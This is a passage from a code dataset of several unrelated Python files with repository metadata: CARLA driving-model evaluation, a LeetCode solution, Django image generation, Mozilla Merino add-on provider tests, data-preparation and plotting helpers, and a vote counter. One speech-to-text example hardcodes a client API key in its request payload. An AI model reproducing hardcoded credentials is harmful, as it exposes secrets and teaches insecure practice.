tf.ones(model.occlusion_shape, dtype=tf.float32, name='Pred_Occlusion_Map') * model.predOcclValue\n with tf.variable_scope(tf.get_variable_scope()) as vscope:\n with tf.device(\"/gpu:%d\" % gpu[0]):\n\n #fetch input\n model.input_batch = tf.placeholder(tf.float32, shape=input_batch_shape,name='input_batch')\n model.map_batch = tf.placeholder(tf.float32, shape=maps_batch_shape,name='map_batch')\n model.transformation_batch = tf.placeholder(tf.float32, shape=transformation_batch_shape,name='transformation_batch')\n model.rgb_cam = tf.placeholder(tf.float32, shape=rgb_batch_shape,name='rgb_cam')\n model.seg_cam = tf.placeholder(tf.float32, shape=segmentation_batch_shape,name='seg_cam')\n model.dep_cam = tf.placeholder(tf.float32, shape=depth_batch_shape,name='dep_cam')\n model.direction = tf.placeholder(tf.uint8, shape=direction_batch_shape,name='direction')\n\n # Construct the model\n pred, _, _, rgb_pred, seg_pred, dep_pred, trans_pred, dir_pred, sy_pred = model.forward(model.input_batch, model.map_batch, model.transformation_batch, model.rgb_cam, model.seg_cam, model.dep_cam, model.direction)\n\n model.G = tf.stack(axis=3, values=pred)\n model.trans_pred = trans_pred\n model.rgb_pred = tf.stack(rgb_pred,1)\n model.seg_pred = tf.stack(seg_pred,1)\n model.dep_pred = tf.stack(dep_pred,1)\n model.speedyaw_pred = sy_pred\n model.dir_pred = dir_pred\n\n tf.get_variable_scope().reuse_variables()\n\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.8, allow_growth=True)\n\n with graph.as_default():\n\n model.saver = tf.train.Saver()\n\n init = tf.global_variables_initializer()\n\n sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,log_device_placement=False,gpu_options=gpu_options))\n\n sess.run(init)\n\n bool, ckpt = model.load(sess, checkpoint_dir, best_model)\n print(checkpoint_dir)\n if bool:\n print(\" [*] Load SUCCESS\")\n else:\n print(\" [!] Load failed... exitting\")\n print(\" [!] Checkpoint file is: \"+str(ckpt))\n if ckpt != None:\n print(ckpt.model_checkpoint_path)\n return\n\n# standard eval call, displays predicted grid map and images\ndef eval(input_gridmap, rgb, dep, seg, yaw_rate, speed):\n # preprocess input\n ppTime = time.time()\n ready, gridmap, gm_map, trans_matrix, rgb, seg, dep, dir_vehicle = preprocessing(input_gridmap, rgb, dep, seg, yaw_rate, speed)\n ppTime = time.time() - ppTime\n if ready:\n evTime = time.time()\n samples, rgb_pred, seg_pred, dep_pred, tfmat, speedyawrate, dir_pred = sess.run([model.G, model.rgb_pred, model.seg_pred, model.dep_pred, model.trans_pred, model.speedyaw_pred, model.dir_pred],\n feed_dict={model.input_batch: gridmap,\n model.map_batch: gm_map,\n model.transformation_batch: trans_matrix,\n model.rgb_cam: rgb,\n model.seg_cam: seg,\n model.dep_cam: dep,\n model.direction: dir_vehicle})\n\n evTime = time.time() - evTime\n imTime = time.time()\n\n samples_seq_step = (samples[0, :, :,:].swapaxes(0, 2).swapaxes(1, 2) + 1) / 2.0\n samples_seq_step = np.tile(samples_seq_step, [1,1,1,3])\n\n curr_frame = []\n\n rgb_pred = (np.clip(rgb_pred,-1,1)+1)/2 * 255\n seg_pred = (seg_pred+1)/2 * 255\n dep_pred = (dep_pred+1)/2 * 255\n\n for seq_step in range(T):\n pred = np.squeeze(samples_seq_step[K+seq_step])\n pred = (pred * 255).astype(\"uint8\")\n curr_frame.append(np.concatenate([\n np.asarray(Image.fromarray(pred).resize((data_h,data_h),Image.ANTIALIAS)),\n rgb_pred[0,K+seq_step,:,:,:],\n seg_pred[0,K+seq_step,:,:,:],\n np.tile(dep_pred[0,K+seq_step,:,:,:],[1,1,3])],1))\n\n npImg = np.uint8(np.concatenate(curr_frame,0))\n\n im = Image.fromarray(npImg)\n imTime = time.time() - imTime\n tkTime = time.time()\n image1 = ImageTk.PhotoImage(im)\n canvas.create_image(0, 0, image=image1, anchor=\"nw\")\n canvas.update()\n tkTime = time.time() - tkTime\n return ppTime, evTime, imTime, tkTime, speedyawrate, dir_pred, True, npImg\n\n return ppTime, 0, 0, 0, np.nan, np.nan, False, -1\n\n# eval call that only returns predicted odometry without displaying predictions\ndef eval_only_drive(input_gridmap, rgb, dep, seg, yaw_rate, speed):\n # preprocess input\n ppTime = time.time()\n ready, gridmap, gm_map, trans_matrix, rgb, seg, dep, dir_vehicle = preprocessing(input_gridmap, rgb, dep, seg, yaw_rate, speed)\n ppTime = time.time() - ppTime\n if ready:\n evTime = time.time()\n tfmat, speedyawrate, dir_pred = sess.run([model.trans_pred, model.speedyaw_pred, model.dir_pred],\n feed_dict={model.input_batch: gridmap,\n model.map_batch: gm_map,\n model.transformation_batch: trans_matrix,\n model.rgb_cam: rgb,\n model.seg_cam: seg,\n model.dep_cam: dep,\n model.direction: dir_vehicle})\n\n evTime = time.time() - evTime\n return ppTime, evTime, 0, 0, speedyawrate, dir_pred\n\n return ppTime, 0, 0, 0, np.nan, np.nan\n\n#following functions are from the preprocessing script\ndef create_default_element(image_size, seq_length, channel_size):\n element = np.zeros([image_size, image_size, seq_length * channel_size], dtype=np.float32)\n return element\n\ndef read_frame(occup_map, occlusion_map):\n #dummy values as long as no underlying road can be extracted from carla - backward comp. with NN model\n lines_map = np.ones(shape=(occup_map.shape)) * 255\n road_map = np.ones(shape=(occup_map.shape)) * 255\n if len(occlusion_map.shape) == 3:\n occlusion_map = np.mean(occlusion_map, axis=2)\n return np.stack([occup_map*255, occlusion_map*255, lines_map, road_map, occlusion_map*255], axis=2)\n\ndef read_matrix(matrix):\n tf_matrix = np.zeros([3,8], dtype=np.float32)\n tf_matrix[:,0:3] = matrix[:,0,:]\n tf_matrix[:,3:6] = matrix[:,1,:]\n return tf_matrix\n\ndef normalize_frames(frames):\n new_frames = frames.astype(np.float32)\n new_frames //= (255 // 2)\n new_frames -= 1\n return new_frames\n\ndef get_occupancy_diff(clip):\n occup_clip = np.multiply((clip[:,:,::5] + 1)/2.0, (clip[:,:,4::5] + 1)/2.0)\n occup_diff = occup_clip[:,:,:-1] - occup_clip[:,:,1:]\n occup_diff = np.absolute(occup_diff)\n return np.sum(occup_diff) * 1.0 / occup_diff.shape[2]\n\ndef trigClip(x,fn):\n return fn(np.clip(x,-1,1))\n\ndef inverseTransformationMatrix(nextTf):\n mat = np.zeros([3,2,3], dtype=np.float32)\n mat[:,0,:] = nextTf[:,0:3]\n mat[:,1,:] = nextTf[:,3:6]\n matFull = np.clip(mat[0,:],-1,1)\n #mean theta extracted from matrix\n theta = -(math.asin(-matFull[0,1])+math.asin(matFull[1,0]))/2\n imsize = 96 // 2\n pixel_diff_y = matFull[1,2] * ((imsize - 1) / 2.0)\n pixel_diff_x = matFull[0,2] * ((imsize - 1) / 2.0)\n py = pixel_diff_y / math.cos(theta)\n px = pixel_diff_x / math.sin(theta)\n\n if np.isinf(px) or np.isnan(px):\n pixel_diff = py\n elif np.isinf(py) or np.isnan(py):\n pixel_diff = px\n else:\n pixel_diff = (px+py)/2\n pixel_size = 45.6 * 1.0 / imsize\n period_duration = 1.0 / 24\n vel = pixel_diff * pixel_size / period_duration\n yaw_rate = math.degrees(theta) / period_duration\n return vel, yaw_rate\n\ndef compressMoveMapDataset(occupancy_buffer, occlusion_buffer, transformation_buffer, seq_length,\n transformation_only=False, split_number = 0, split_amount = 1):\n global return_clips\n global return_transformation\n max_occup_diff = 0\n min_occup_diff = 100000\n mean_occup_diff = 0.0\n all_clips = [create_default_element(image_size, seq_length, 5) for i in range(seq_length)]\n all_transformation = [np.zeros([seq_length, 3, 8], dtype=np.float32) for i in range(seq_length)]\n\n #step_offset = int(round(1.0 * step_size / split_amount * split_number))\n\n for file_index in range(len(occupancy_buffer)):\n frame = read_frame(occupancy_buffer[file_index], occlusion_buffer[file_index])\n if transformation_only:\n frame = np.zeros([1,1,1])\n transform_matrix = read_matrix(transformation_buffer[file_index])\n\n channel_size = frame.shape[2]\n\n norm_frame = normalize_frames(frame)\n for clip_index in range(len(all_clips)):\n if not transformation_only:\n all_clips[clip_index][:, :, clip_index * channel_size: (clip_index + 1) * channel_size] = norm_frame\n all_transformation[clip_index][clip_index,:,:] = transform_matrix\n if file_index >= seq_length - 1:\n if not transformation_only:\n occup_diff = get_occupancy_diff(all_clips[-1])\n max_occup_diff = max(max_occup_diff, occup_diff)\n min_occup_diff = min(min_occup_diff, occup_diff)\n mean_occup_diff = mean_occup_diff + occup_diff\n if transformation_only or occup_diff >= 0: #was 6\n if not transformation_only:\n return_clips.append(all_clips[-1])\n return_transformation.append(all_transformation[-1])\n else:\n print(\"Sequence not saved due to occupancy difference of \" + str(occup_diff))\n\n del all_clips[-1]\n del all_transformation[-1]\n all_clips.insert(0, create_default_element(image_size, seq_length, channel_size))\n all_transformation.insert(0, np.zeros([seq_length, 3, 8], dtype=np.float32))\n\ndef preprocessing(img, rgb, depth, segmentation, yaw_rate, speed):\n global occupancy_buffer, occlusion_buffer, transformation_buffer, rgb_buffer, depth_buffer\n global segmentation_buffer, data_size, direction_buffer, return_clips, return_transformation\n seq_length = K + 1\n\n #find the direction (left,right,straight)\n if yaw_rate < -0.5: #going left\n direction_buffer.append([1,1])\n elif yaw_rate > 0.5: #going right\n direction_buffer.append([0,1])\n else: #going straight\n direction_buffer.append([0,0])\n new_size = tuple(t//8 for t in rgb.shape[:-1]) # from 1920 x 640 to 240 x 80\n data_size = [new_size[1], new_size[0]]\n new_size = tuple(data_size)\n rgb_buffer.append(pp.transform_input(rgb, new_size, False))\n depth_buffer.append(pp.transform_input(depth, new_size, True))\n segmentation_buffer.append(pp.transform_input(segmentation, new_size, False))\n occupancy_img = pp.cropAndResizeImage(img)\n occupancy_array = np.array(occupancy_img)\n if len(occupancy_array.shape) == 3:\n occupancy_array = np.mean(occupancy_array, axis=2)\n occlusion_array = pp.createOcclusionMap(occupancy_array)\n occupancy_mask = pp.createOccupancyMask(occupancy_img, occlusion_array, thresh)\n transformation_matrix = pp.calcImageTranslation(occupancy_array, yaw_rate, speed)\n occupancy_buffer.append(occupancy_mask)\n occlusion_buffer.append(occlusion_array)\n transformation_buffer.append(transformation_matrix)\n if len(occupancy_buffer) >= K+1:\n return_clips = []\n return_transformation = []\n compressMoveMapDataset(occupancy_buffer, occlusion_buffer, transformation_buffer, seq_length)\n return_camera_rgb = np.array(rgb_buffer)\n return_camera_segmentation = np.array(segmentation_buffer)\n return_camera_depth = np.expand_dims(np.array(depth_buffer),axis=-1)\n return_direction = np.array(direction_buffer).astype(np.uint8)\n tmpClips = np.stack(np.split(np.array(return_clips[0])[:,:,:seq_length*5], seq_length, axis=2), axis=2)\n input_seq = tmpClips[:,:,:-1,0:2]\n maps = tmpClips[:,:,:,2:4]\n input_seq[:,:,:,0:1] = np.multiply((tmpClips[:,:,:-1,4:5] + 1) // 2, (input_seq[:,:,:,0:1] + 1) // 2) * 2 - 1\n tf_matrix = np.array(return_transformation)[0]#[:seq_length-1]\n tf_matrix = tf_matrix[:seq_length-1]\n tf_matrix[:,:,2] = tf_matrix[:,:,2]\n tf_matrix[:,:,5] = - tf_matrix[:,:,5]\n del occupancy_buffer[0]\n del occlusion_buffer[0]\n del transformation_buffer[0]\n del rgb_buffer[0]\n del depth_buffer[0]\n del segmentation_buffer[0]\n del direction_buffer[0]\n return True, np.expand_dims(input_seq, axis=0), np.expand_dims(maps, axis=0), np.expand_dims(tf_matrix, axis=0), np.expand_dims(return_camera_rgb[1:], axis=0), np.expand_dims(return_camera_segmentation[1:], axis=0), np.expand_dims(return_camera_depth[1:], axis=0), np.expand_dims(return_direction[1:], axis=0)\n\n return False, -1, -1, -1, -1, -1, -1, -1\n","repo_name":"daviddao/selfdriving","sub_path":"carla/real_time_eval/tf_carla_eval.py","file_name":"tf_carla_eval.py","file_ext":"py","file_size_in_byte":16777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15590474210","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \n \nclass Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n # the idea is to compare the first half and the reversed second half\n \n # 1. find the middle \n slow, fast = ListNode(0, head), head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n first, second, slow.next = head, slow.next, None\n \n # 2. reverse second half\n prev = None\n while second:\n second.next, prev, second, = prev, second, second.next\n second = prev\n \n # 3. compare\n while first and second:\n if first.val != second.val:\n return False\n first, second = first.next, second.next\n return True\n \n \n ","repo_name":"windsuzu/Leetcode-Python","sub_path":"code/linked-list/palindrome-linked-list.py","file_name":"palindrome-linked-list.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37817546153","text":"import requests\r\nimport json\r\n\r\ntry:\r\n configdata={\r\n \"clientAPIkey\": \"Z46I-CMFJ-3TC2-9SCT\",\r\n \"video_name\": \"kav1.mp4\"\r\n}\r\n url = \"http://127.0.0.1:5003/stt/upload\"\r\n response = requests.post(url, json=configdata)\r\n if response.status_code == 200:\r\n transcribed_text = response.json()[\"result\"] \r\n print(transcribed_text)\r\n else:\r\n transcribed_text = \"\"\r\n print(\"Request was not successful. Status code:\", response.status_code)\r\nexcept Exception as e:\r\n print(f\"Error: {e}\")","repo_name":"KaveeshTata/Interview_Fullstack_V2","sub_path":"Speech_To_Text_Accelerator_v1/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4476303497","text":"# Stuff related to the library\nLIBRARY_URL = \"https://github.com/GetRektByMe/Listen\"\n\n# Unrelated to anything we can use\nBASE_URL = \"https://listen.moe/api/\"\n\nAUTH_URL = BASE_URL + \"authenticate\"\n\n# Account endpoints\nUSER = BASE_URL + \"user\"\nUSER_FAVOURITES = BASE_URL + \"user/favorites\"\n\n# Song endpoints\nSONG_FAVOURITES = BASE_URL + \"songs/favorite\"\nSONG_REQUEST = BASE_URL + \"songs/request\"\n\nSOCKET_ENDPOINT = \"wss://listen.moe/api/v2/socket\"\n","repo_name":"byronvanstien/Listen","sub_path":"listen/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2729479363","text":"# coding=utf-8\r\nfrom django.http import HttpResponse, HttpResponseBadRequest\r\nfrom django import forms\r\nfrom io import BytesIO\r\nfrom PIL import Image, ImageDraw\r\nfrom django.core.cache import cache\r\n\r\nfrom django.views.decorators.http import etag\r\n\r\n# class ImageForm(forms.Form):\r\n# height = forms.IntegerField(min_value=1, max_value=2000)\r\n# width = forms.IntegerField(min_value=1, max_value=2000)\r\n\r\ndef generate(width,height,image_format=\"PNG\"):\r\n # 服务器缓存,先看是否已有缓存\r\n key = '{}.{}.{}'.format(width, height, image_format)\r\n content = cache.get(key)\r\n if content is None:\r\n image = Image.new('RGB', (width, height))\r\n draw = ImageDraw.Draw(image)\r\n text = '{}x{}'.format(width, height)\r\n textwidth, textheight = draw.textsize(text)\r\n if textwidth < width and textheight < height:\r\n texttop = (height - textheight) // 2\r\n textleft = (width - textwidth) // 2\r\n draw.text((textleft, texttop), text, fill=(255, 0, 0))\r\n content = BytesIO()\r\n image.save(content, image_format)\r\n content.seek(0)\r\n # # 加入缓存\r\n # cache.set(key,content,60 * 60)\r\n return content\r\n\r\n# 浏览器缓存: etag 可以利用浏览器缓存技术\r\n# import hashlib\r\n# def generate_etag(request,width,height):\r\n# content = 'Placeholder:{0}×{1}'.format(width,height)\r\n# return hashlib.sha1(content.encode('utf-8')).hexdigest()\r\n#\r\n# @etag(generate_etag)\r\n# def placeholder(request, width, height):\r\n# # 传给视图的参数都是字符串,可以利用表单验证\r\n# form = generate({'height': height, 'width': width})\r\n# if form.is_valid():\r\n# height = form.cleaned_data['height']\r\n# width = form.cleaned_data['width']\r\n# # 生成特定尺寸的图片\r\n# image = form.generate()\r\n# return HttpResponse(image, content_type='image/png')\r\n# else:\r\n# return HttpResponseBadRequest('Invalid Image Request')\r\n\r\n\r\n# def generate(width,height,image_format=\"PNG\"):\r\n# image=Image.new('RGB',(width,height))\r\n# draw=ImageDraw.Draw(image)\r\n# text=\"{}x{}\".format(width,height)\r\n# textwidth,textheight=draw.textsize(text)\r\n# if textwidth<width and textheight<height:\r\n# texttop=(height-textheight)//2\r\n# textleft=(width-textwidth)//2\r\n# draw.text((textleft,texttop),text,fill=(255,0,0))\r\n#\r\n# content = BytesIO()\r\n# image.save(content, image_format)\r\n# content.seek(0)\r\n# # image.show()\r\n# return content\r\n# # generate(400,300)\r\n \r\n \r\n \r\n ","repo_name":"liuchenfen/django_img","sub_path":"django3/myAPP/createimg.py","file_name":"createimg.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40736247265","text":"\"\"\"Test Addon Provider\"\"\"\nimport datetime\nimport time\nfrom typing import Any\n\nimport freezegun\nimport pytest\nfrom _pytest.logging import LogCaptureFixture\nfrom pydantic import HttpUrl\n\nfrom merino.middleware.geolocation import Location\nfrom merino.providers.amo.addons_data import ADDON_DATA, SupportedAddon\nfrom merino.providers.amo.backends.protocol import Addon, AmoBackendError\nfrom merino.providers.amo.backends.static import (\n STATIC_RATING_AND_ICONS,\n StaticAmoBackend,\n)\nfrom merino.providers.amo.provider import AddonSuggestion\nfrom merino.providers.amo.provider import Provider as AddonsProvider\nfrom merino.providers.amo.provider import invert_and_expand_index_keywords\nfrom merino.providers.base import SuggestionRequest\nfrom merino.providers.custom_details import AmoDetails, CustomDetails\n\n\nclass AmoErrorBackend:\n \"\"\"AmoBackend that raises an error for testing.\"\"\"\n\n async def get_addon(self, addon_key: SupportedAddon) -> Addon: # pragma: no cover\n \"\"\"Get an Addon based on the addon_key.\n Raise a `BackendError` if the addon key is missing.\n \"\"\"\n raise AmoBackendError(\"Error!!!\")\n\n async def fetch_and_cache_addons_info(self) -> None:\n \"\"\"Fetch addons to be stored.\"\"\"\n pass\n\n\nclass AmoInitErrorBackend:\n \"\"\"AmoBackend that raises an error during initialization.\"\"\"\n\n async def get_addon(self, addon_key: SupportedAddon) -> Addon: # pragma: no cover\n \"\"\"Get an Addon based on the addon_key.\n Raise a `BackendError` if the addon key is missing.\n \"\"\"\n raise AmoBackendError(\"Addon key missing!\")\n\n async def fetch_and_cache_addons_info(self) -> None:\n \"\"\"Initialize addons to be stored.\"\"\"\n raise AmoBackendError(\"Error!!!\")\n\n\n@pytest.fixture(name=\"keywords\")\ndef fixture_keywords() -> dict[SupportedAddon, set[str]]:\n \"\"\"Fixture for the keywords.\"\"\"\n return {\n SupportedAddon.VIDEO_DOWNLOADER: {\"addon\", \"download helper\"},\n SupportedAddon.LANGAUGE_TOOL: {\n \"dictionary\",\n },\n }\n\n\n@pytest.fixture(name=\"static_backend\")\ndef fixture_static_backend() -> StaticAmoBackend:\n \"\"\"Fixture for static backend.\"\"\"\n return StaticAmoBackend()\n\n\n@pytest.fixture(name=\"addons_provider\")\ndef fixture_addon_provider(\n keywords: dict[SupportedAddon, set[str]], static_backend: StaticAmoBackend\n) -> AddonsProvider:\n \"\"\"Fixture for Addon Provider.\"\"\"\n provider = AddonsProvider(\n backend=static_backend,\n keywords=keywords,\n name=\"amo\",\n score=0.3,\n min_chars=4,\n )\n return provider\n\n\ndef test_reverse_and_expand_keywords(keywords: dict[SupportedAddon, set[str]]):\n \"\"\"Test that we expand the keywords properly for the lookup table.\"\"\"\n assert {\n \"addon\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download \": SupportedAddon.VIDEO_DOWNLOADER,\n \"download h\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download he\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download hel\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download help\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download helpe\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download helper\": SupportedAddon.VIDEO_DOWNLOADER,\n \"dictionary\": SupportedAddon.LANGAUGE_TOOL,\n } == invert_and_expand_index_keywords(keywords)\n\n\n@pytest.mark.asyncio\nasync def test_query_string_too_short(\n addons_provider: AddonsProvider,\n):\n \"\"\"Test that we return no suggestion for a query that is too short.\"\"\"\n await addons_provider.initialize()\n req = SuggestionRequest(query=\"a\", geolocation=Location())\n assert [] == await addons_provider.query(req)\n\n\n@pytest.mark.asyncio\nasync def test_query_no_keyword_matches(\n addons_provider: AddonsProvider,\n):\n \"\"\"Test that a keyword that doesn't match any current keywords returns no results.\"\"\"\n await addons_provider.initialize()\n req = SuggestionRequest(query=\"amazing\", geolocation=Location())\n assert [] == await addons_provider.query(req)\n\n\n@pytest.mark.asyncio\nasync def test_query_return_match(\n addons_provider: AddonsProvider,\n):\n \"\"\"Test that we match one provider.\"\"\"\n await addons_provider.initialize()\n\n req = SuggestionRequest(query=\"dictionary\", geolocation=Location())\n expected_info: dict[str, str] = ADDON_DATA[SupportedAddon.LANGAUGE_TOOL]\n expected_icon_rating: dict[str, Any] = STATIC_RATING_AND_ICONS[\n SupportedAddon.LANGAUGE_TOOL\n ]\n assert [\n AddonSuggestion(\n title=expected_info[\"name\"],\n description=expected_info[\"description\"],\n url=HttpUrl(expected_info[\"url\"]),\n score=0.3,\n provider=\"amo\",\n icon=expected_icon_rating[\"icon\"],\n custom_details=CustomDetails(\n amo=AmoDetails(\n rating=expected_icon_rating[\"rating\"],\n number_of_ratings=expected_icon_rating[\"number_of_ratings\"],\n guid=expected_info[\"guid\"],\n )\n ),\n )\n ] == await addons_provider.query(req)\n\n\n@pytest.mark.asyncio\nasync def test_query_error(\n caplog: LogCaptureFixture, keywords: dict[SupportedAddon, set[str]]\n):\n \"\"\"Test that provider can handle query error.\"\"\"\n provider = AddonsProvider(\n backend=AmoErrorBackend(),\n keywords=keywords,\n name=\"addons\",\n score=0.3,\n min_chars=4,\n )\n await provider.initialize()\n\n req = SuggestionRequest(query=\"dictionary\", geolocation=Location())\n suggestions = await provider.query(req)\n assert suggestions == []\n\n assert len(caplog.messages) == 1\n assert caplog.messages[0].startswith(\"Error getting AMO suggestion:\")\n\n\n@pytest.mark.asyncio\nasync def test_fetch_addon_info_error(\n caplog: LogCaptureFixture, keywords: dict[SupportedAddon, set[str]]\n):\n \"\"\"Test that provider can handle fetch errors.\"\"\"\n provider = AddonsProvider(\n backend=AmoInitErrorBackend(),\n keywords=keywords,\n name=\"addons\",\n score=0.3,\n min_chars=4,\n )\n await provider._fetch_addon_info()\n\n assert len(caplog.messages) == 1\n assert caplog.messages[0].startswith(\"Failed to fetch addon information:\")\n\n # The last_fetch_at time has not been initialized\n assert provider.last_fetch_at is None\n\n\n@freezegun.freeze_time(\"2012-01-14 03:21:34\")\n@pytest.mark.asyncio\nasync def test_fetch_addon(\n addons_provider: AddonsProvider,\n keywords: dict[SupportedAddon, set[str]],\n):\n \"\"\"Test that provider can handle fetch errors.\"\"\"\n await addons_provider._fetch_addon_info()\n assert (\n addons_provider.last_fetch_at\n == datetime.datetime(\n year=2012, month=1, day=14, hour=3, minute=21, second=34\n ).timestamp()\n )\n\n\ndef test_should_fetch_false(addons_provider: AddonsProvider):\n \"\"\"Test that provider should fetch is false.\"\"\"\n addons_provider.last_fetch_at = time.time()\n assert addons_provider._should_fetch() is False\n\n\ndef test_should_fetch_true(addons_provider: AddonsProvider):\n \"\"\"Test that provider should fetch is true.\"\"\"\n addons_provider.last_fetch_at = (\n time.time() - addons_provider.resync_interval_sec - 100\n )\n assert addons_provider._should_fetch()\n","repo_name":"mozilla-services/merino-py","sub_path":"tests/unit/providers/amo/test_provider.py","file_name":"test_provider.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"12141582165","text":"import acquire\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndef prepare_store(df):\n \"\"\"Takes in store data as pandas dataframe, prepares it, and returns cleaned dataframe\"\"\"\n \n # Convert sale date to datetime and set as index. Time portion not needed. Splitting like this and specifying format speeds it up.\n df.sale_date = pd.to_datetime(df.sale_date.str.split(' 00:00:00 GMT').str[0].str.split(', ').str[1],format='%d %b %Y')\n\n df= df.set_index('sale_date').sort_index()\n \n # Create month and day of week columns\n df['month'] = df.index.month\n df['day_of_week'] = df.index.day_of_week\n \n # Calculate total sale amount ($$), sale quantity(amount) * item price\n df['sales_total'] = df.sale_amount*df.item_price\n \n df = df.rename(columns = {'sale_amount':'quantity'})\n \n \n return df\n\ndef prepare_power(df):\n \"\"\"Takes in OPS data as pandas dataframe, prepare it, and returns cleaned dataframe\"\"\"\n \n # Convert date to datetime and set as index\n df.index = pd.to_datetime(df.Date)\n\n df= df.sort_index()\n\n df['month'] = df.index.month\n df['year'] = df.index.year\n \n df.columns = [col.replace('+','_').lower() for col in df.columns]\n \n # Fill in null values with 0 - mostly from early years presumably when no alternative energy?\n df = df.fillna(0)\n \n return df","repo_name":"jesse-d-marder/time-series-exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72820273399","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom texpl import compute_top_words\nfrom utils import read_file, write_file\nfrom string import Template\n\n\ndef plot_train_loss(rdf, out_file=None, dpi=300):\n fig, ax = plt.subplots(figsize=(6, 4))\n epochs = np.array(rdf.index) + 1\n ax.plot(epochs, rdf['train_loss'], color='#ff8c5e', label='train_loss')\n ax.plot(epochs, rdf['eval_loss'], color='#ff8c5e', linestyle='--', label='eval_loss')\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.set_xlabel(\"Epoch\")\n ax.set_ylabel(\"Loss\")\n ax.legend([\"Training Loss\", \"Validation Loss\"])\n plt.tight_layout()\n if out_file is None:\n plt.show()\n else:\n plt.savefig(out_file, dpi=dpi)\n\n \ndef cluster_visualization(res_clusters, corpus, scores, uq_ids, template_file, out_file):\n clusters_json = []\n scores = np.array(scores)\n for c in np.unique(res_clusters):\n in_cluster = np.where(res_clusters==c)[0]\n top_words = compute_top_words([corpus[i] for i in in_cluster], n_top=4)\n clusters_json.append(\n {'name': ', '.join(top_words), 'score': round(float(scores[in_cluster].mean()), 3),\n 'children': [{\n 'name': corpus[i],\n 'score': round(float(scores[i]), 3),\n 'id': uq_ids[i]\n } for i in in_cluster]})\n \n clusters_json = {'name': '', 'children': clusters_json}\n d3_src = Template(read_file(template_file))\n\n html_src = d3_src.substitute({'python_data': json.dumps(clusters_json, indent=4)})\n write_file(out_file, html_src)\n \n\ndef plot_num_clusters(dis_thres, n_clusters, size=(6, 4), out_file=None, dpi=300):\n fig, ax = plt.subplots(figsize=size)\n bp = ax.bar([f\"{e:.2f}\" for e in dis_thres], n_clusters, color='#ffce72')\n ax.bar_label(bp)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n plt.xlabel(\"Distance threshold\")\n plt.ylabel(\"Number of clusters\")\n plt.tight_layout()\n if out_file is None:\n plt.show()\n else:\n plt.savefig(out_file, dpi=dpi)\n\n\ndef plot_num_phrases(thres_vals, n_phrases, size=(6, 4), out_file=None, dpi=300):\n fig, ax = plt.subplots(figsize=size)\n bp = ax.bar([f\"{e:.2f}\" for e in thres_vals], n_phrases, color='#ff8c5e')\n ax.bar_label(bp)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n plt.xlabel(\"Standard deviations\")\n plt.ylabel(\"Number of phrases\")\n plt.tight_layout()\n if out_file is None:\n plt.show()\n else:\n plt.savefig(out_file, dpi=dpi)\n","repo_name":"arteagac/tna","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9904909040","text":"\"\"\"Program to count votes\r\n2014-04-23\r\nTauhirah Eguardo\"\"\"\r\nfrom collections import Counter\r\n\r\ndef organiser(array,orig):\r\n #use counter function on original list, to get values in new list\r\n #\r\n x = Counter(orig)\r\n for i in range(len(array)):\r\n array[i] = \"{:<10}\".format(array[i]) +\" - \" + str(x[array[i]])\r\n i += 1 \r\n \r\n#found fastest method using fromkeys() to remove duplicates in list.\r\n#http://www.peterbe.com/plog/uniqifiers-benchmark\r\n#Better than original cleaner, runs much much faster.\r\ndef cleaner(seq):\r\n \r\n return sorted({}.fromkeys(seq).keys())\r\n\r\ndef main():\r\n string_list = []\r\n name =\"\"\r\n print(\"Independent Electoral Commission\\n\"\r\n \"--------------------------------\\n\"\r\n \"Enter the names of parties (terminated by DONE):\")\r\n #while loop to add values to list\r\n while name != \"DONE\":\r\n name = input()\r\n string_list.append(name)\r\n del string_list[-1]\r\n new_list = cleaner(string_list)\r\n organiser(new_list,string_list)\r\n print()\r\n print(\"Vote counts:\")\r\n for i in range(len(new_list)):\r\n print(new_list[i])\r\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/edwmoe001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20011798553","text":"from dataall.base.api.context import Context\nfrom dataall.core.environment.db.environment_models import Environment\nfrom 